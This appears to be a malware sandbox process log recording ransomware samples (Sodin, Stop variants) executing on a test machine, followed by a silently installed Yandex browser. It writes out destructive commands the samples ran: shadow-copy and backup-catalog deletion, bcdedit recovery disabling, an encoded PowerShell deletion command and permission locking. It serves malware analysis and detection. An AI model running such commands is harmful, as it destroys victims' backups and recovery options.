C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}4⤵PID:12536
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"4⤵PID:14164
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /DELETE /TN /F "HG6irydd"4⤵PID:6068
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f9387370.vbs"4⤵PID:13508
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet4⤵PID:12904
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete4⤵PID:9492
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵PID:6808
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet4⤵PID:5624
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Sodin.aak-3cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57.exeTrojan-Ransom.Win32.Sodin.aak-3cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==4⤵PID:13028
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Sodin.abd-74d6a5acee6c8836de88c9bea92c3d785d521cdee91abaf272c2a2c81b30c09c.exeTrojan-Ransom.Win32.Sodin.abd-74d6a5acee6c8836de88c9bea92c3d785d521cdee91abaf272c2a2c81b30c09c.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==4⤵PID:9508
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Sodin.ba-40ce070f8d58d68aedfca96e572f146d5416edbc4103dc8025bca94880e2a103.exeTrojan-Ransom.Win32.Sodin.ba-40ce070f8d58d68aedfca96e572f146d5416edbc4103dc8025bca94880e2a103.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==4⤵PID:428
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Sodin.g-3fdad99a17a6766fe396081f82394f5e2da0142651427da64a5b6e28c9df2fd4.exeTrojan-Ransom.Win32.Sodin.g-3fdad99a17a6766fe396081f82394f5e2da0142651427da64a5b6e28c9df2fd4.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6192 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵PID:12748
-
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exeTrojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:8252 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\84469962-1738-4351-a4db-3759ea57a846" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:9572 -
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exe"C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:11868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11868 -s 17125⤵
- Program crash
PID:8236 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8252 -s 19844⤵
- Program crash
PID:5704 -
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Stop.mr-2afa5929643add75465fb583e519d5f5bd0d61e75b15382aafd6980eadc79a7e.exeTrojan-Ransom.Win32.Stop.mr-2afa5929643add75465fb583e519d5f5bd0d61e75b15382aafd6980eadc79a7e.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:10312 -
C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Stop.mr-2afa5929643add75465fb583e519d5f5bd0d61e75b15382aafd6980eadc79a7e.exe"C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Stop.mr-2afa5929643add75465fb583e519d5f5bd0d61e75b15382aafd6980eadc79a7e.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:10936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10936 -s 18605⤵
- Program crash
PID:14260 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10312 -s 17004⤵
- Program crash
PID:8384 -
C:\Users\Admin\Desktop\00381\UDS-Trojan-Ransom.Win32.Gen.eh-b98f76b34aa9e347f36b2b55f95bf4fee99e70af3f741542f51bdb595f1e2ed5.exeUDS-Trojan-Ransom.Win32.Gen.eh-b98f76b34aa9e347f36b2b55f95bf4fee99e70af3f741542f51bdb595f1e2ed5.exe3⤵PID:7812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1468 -ip 14681⤵PID:4224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3620 -ip 36201⤵PID:3136
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5056 -ip 50561⤵PID:3812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3628 -ip 36281⤵PID:10996
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:11564 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DD08AB9E59F3F9FA2F9611F3B3C2CFF22⤵PID:11232
-
C:\Users\Admin\AppData\Local\Temp\1E6AAEC1-F6E7-469D-9F43-4600C4CE9CB9\lite_installer.exe"C:\Users\Admin\AppData\Local\Temp\1E6AAEC1-F6E7-469D-9F43-4600C4CE9CB9\lite_installer.exe" --use-user-default-locale --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --YABROWSER3⤵PID:12196
-
C:\Users\Admin\AppData\Local\Temp\47CCB28F-2936-46F8-820E-47CAECDB705C\seederexe.exe"C:\Users\Admin\AppData\Local\Temp\47CCB28F-2936-46F8-820E-47CAECDB705C\seederexe.exe" "--yqs=y" "--yhp=y" "--ilight=" "--oem=" "--nopin=n" "--pin_custom=n" "--pin_desktop=n" "--pin_taskbar=y" "--locale=us" "--browser=y" "--browser_default=" "--loglevel=trace" "--ess=" "--clids=C:\Users\Admin\AppData\Local\Temp\clids-yasearch.xml" "--sender=C:\Users\Admin\AppData\Local\Temp\92A523A1-5507-4D83-BDFF-5BF17E305DDE\sender.exe" "--is_elevated=yes" "--ui_level=2" "--good_token=x" "--no_opera=n"3⤵PID:11396
-
C:\Users\Admin\AppData\Local\Temp\92A523A1-5507-4D83-BDFF-5BF17E305DDE\sender.exeC:\Users\Admin\AppData\Local\Temp\92A523A1-5507-4D83-BDFF-5BF17E305DDE\sender.exe --send "/status.xml?clid=2278730-666&uuid=269eb7e5-41b9-4be1-810b-145687bf00b5&vnt=Windows 10x64&file-no=8%0A10%0A11%0A12%0A13%0A17%0A18%0A20%0A21%0A22%0A25%0A36%0A40%0A42%0A43%0A57%0A61%0A89%0A102%0A103%0A123%0A124%0A125%0A129%0A"4⤵PID:13192
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:9412
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10312 -ip 103121⤵PID:10356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 8252 -ip 82521⤵PID:10128
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:11484
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\Restore-My-Files.txt1⤵PID:9128
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:5584
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\76a7e7b91b99422e9a843b03c5bbaba3 /t 5392 /p 58321⤵PID:6064
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\FILES ENCRYPTED.txt1⤵PID:13896
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:14328
-
C:\Users\Admin\AppData\Local\Temp\{56DF45FB-5902-407E-A5DB-9977AFF25387}.exe"C:\Users\Admin\AppData\Local\Temp\{56DF45FB-5902-407E-A5DB-9977AFF25387}.exe" --job-name=yBrowserDownloader-{98827D4D-D37E-4904-9E36-715CDD294B75} --send-statistics --local-path=C:\Users\Admin\AppData\Local\Temp\{56DF45FB-5902-407E-A5DB-9977AFF25387}.exe --YABROWSER --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={269eb7e5-41b9-4be1-810b-145687bf00b5} --use-user-default-locale1⤵PID:14016
-
C:\Users\Admin\AppData\Local\Temp\ybF748.tmp"C:\Users\Admin\AppData\Local\Temp\ybF748.tmp" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\71e84b9d-f731-4e2a-b6ce-2b417d54f122.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=828371691 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{98827D4D-D37E-4904-9E36-715CDD294B75} --local-path="C:\Users\Admin\AppData\Local\Temp\{56DF45FB-5902-407E-A5DB-9977AFF25387}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={269eb7e5-41b9-4be1-810b-145687bf00b5} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\04849534-60e5-442d-b739-6626c0d3e9f4.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"2⤵PID:4880
-
C:\Users\Admin\AppData\Local\Temp\YB_D8E35.tmp\setup.exe"C:\Users\Admin\AppData\Local\Temp\YB_D8E35.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_D8E35.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\71e84b9d-f731-4e2a-b6ce-2b417d54f122.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=828371691 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{98827D4D-D37E-4904-9E36-715CDD294B75} --local-path="C:\Users\Admin\AppData\Local\Temp\{56DF45FB-5902-407E-A5DB-9977AFF25387}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={269eb7e5-41b9-4be1-810b-145687bf00b5} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\04849534-60e5-442d-b739-6626c0d3e9f4.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"3⤵PID:3456
-
C:\Users\Admin\AppData\Local\Temp\YB_D8E35.tmp\setup.exe"C:\Users\Admin\AppData\Local\Temp\YB_D8E35.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_D8E35.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\71e84b9d-f731-4e2a-b6ce-2b417d54f122.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=828371691 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{98827D4D-D37E-4904-9E36-715CDD294B75} --local-path="C:\Users\Admin\AppData\Local\Temp\{56DF45FB-5902-407E-A5DB-9977AFF25387}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=none&ui={269eb7e5-41b9-4be1-810b-145687bf00b5} --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\04849534-60e5-442d-b739-6626c0d3e9f4.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico" --verbose-logging --run-as-admin --target-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application" --child-setup-process --restart-as-admin-time=8998681794⤵
- System Time Discovery
PID:7280 -
C:\Users\Admin\AppData\Local\Temp\YB_D8E35.tmp\setup.exeC:\Users\Admin\AppData\Local\Temp\YB_D8E35.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=7280 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.2.705 --initial-client-data=0x340,0x344,0x348,0x31c,0x34c,0x4dcbe8,0x4dcbf4,0x4dcc005⤵PID:5000
-
C:\Windows\TEMP\sdwra_7280_418254565\service_update.exe"C:\Windows\TEMP\sdwra_7280_418254565\service_update.exe" --setup5⤵PID:12672
-
C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe"C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --install6⤵PID:9748
-
C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exeC:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent5⤵PID:12352
-
C:\Users\Admin\AppData\Local\Temp\pin\explorer.exeC:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent /pin-path="C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.lnk" --is-pinning6⤵PID:5964
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Temp\clids.xml"5⤵PID:7868
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\source7280_1397783821\Browser-bin\clids_yandex_second.xml"5⤵PID:5944
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f4 0x4681⤵PID:6484
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\7bb45f3157e04c678329728a5663899b /t 12652 /p 40601⤵PID:6724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 11868 -ip 118681⤵PID:10432
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\d925cb267d2d40c6a224f3a3e59f4498 /t 13988 /p 88201⤵PID:7184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 10936 -ip 109361⤵PID:12132
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1636
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\750rc-readme.txt1⤵PID:8204
-
C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe"C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --run-as-service1⤵PID:8792
-
C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe"C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=8792 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.2.705 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0xf3e784,0xf3e790,0xf3e79c2⤵PID:14200
-
C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe"C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --update-scheduler2⤵PID:9624
-
C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe"C:\Program Files (x86)\Yandex\YandexBrowser\24.10.2.705\service_update.exe" --update-background-scheduler3⤵PID:5328
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:13244
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --progress-window=0 --install-start-time-no-uac=8283716911⤵PID:13400
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exeC:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id= --annotation=main_process_pid=13400 --annotation=metrics_client_id=c5819ef2c26a4f849800d093f0ed5163 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.2.705 --initial-client-data=0x180,0x184,0x188,0x15c,0x18c,0x71539a24,0x71539a30,0x71539a3c2⤵PID:3848
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id --brand-id=yandex --partner-id=pseudoportal-ru --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --gpu-process-kind=sandboxed --field-trial-handle=2904,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2900 /prefetch:22⤵PID:11944
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id --brand-id=yandex --partner-id=pseudoportal-ru --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --gpu-process-kind=trampoline --field-trial-handle=2104,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2892 /prefetch:62⤵PID:5788
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=ru --service-sandbox-type=none --user-id --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Network Service" --field-trial-handle=2308,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3844 --brver=24.10.2.705 /prefetch:32⤵PID:13812
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=ru --service-sandbox-type=service --user-id --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Storage Service" --field-trial-handle=2544,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3852 --brver=24.10.2.705 /prefetch:82⤵PID:6196
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=ru --service-sandbox-type=audio --user-id --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Audio Service" --field-trial-handle=2728,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4372 --brver=24.10.2.705 /prefetch:82⤵PID:14028
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=ru --service-sandbox-type=none --user-id --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Video Capture" --field-trial-handle=2780,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4488 --brver=24.10.2.705 /prefetch:82⤵PID:7012
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id --brand-id=yandex --partner-id=pseudoportal-ru --extension-process --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://brontp-pre.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --allow-prefetch --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=2672,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4584 /prefetch:22⤵PID:14308
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=3548,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4616 --brver=24.10.2.705 /prefetch:82⤵PID:3440
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://brontp-pre.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --allow-prefetch --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5092,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5104 /prefetch:12⤵PID:2444
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=3980,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5456 --brver=24.10.2.705 /prefetch:82⤵PID:1996
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://brontp-pre.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5484,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5444 /prefetch:12⤵PID:7244
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://brontp-pre.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --ya-custo-process --enable-instaserp --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=6076,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6064 /prefetch:12⤵PID:1716
-
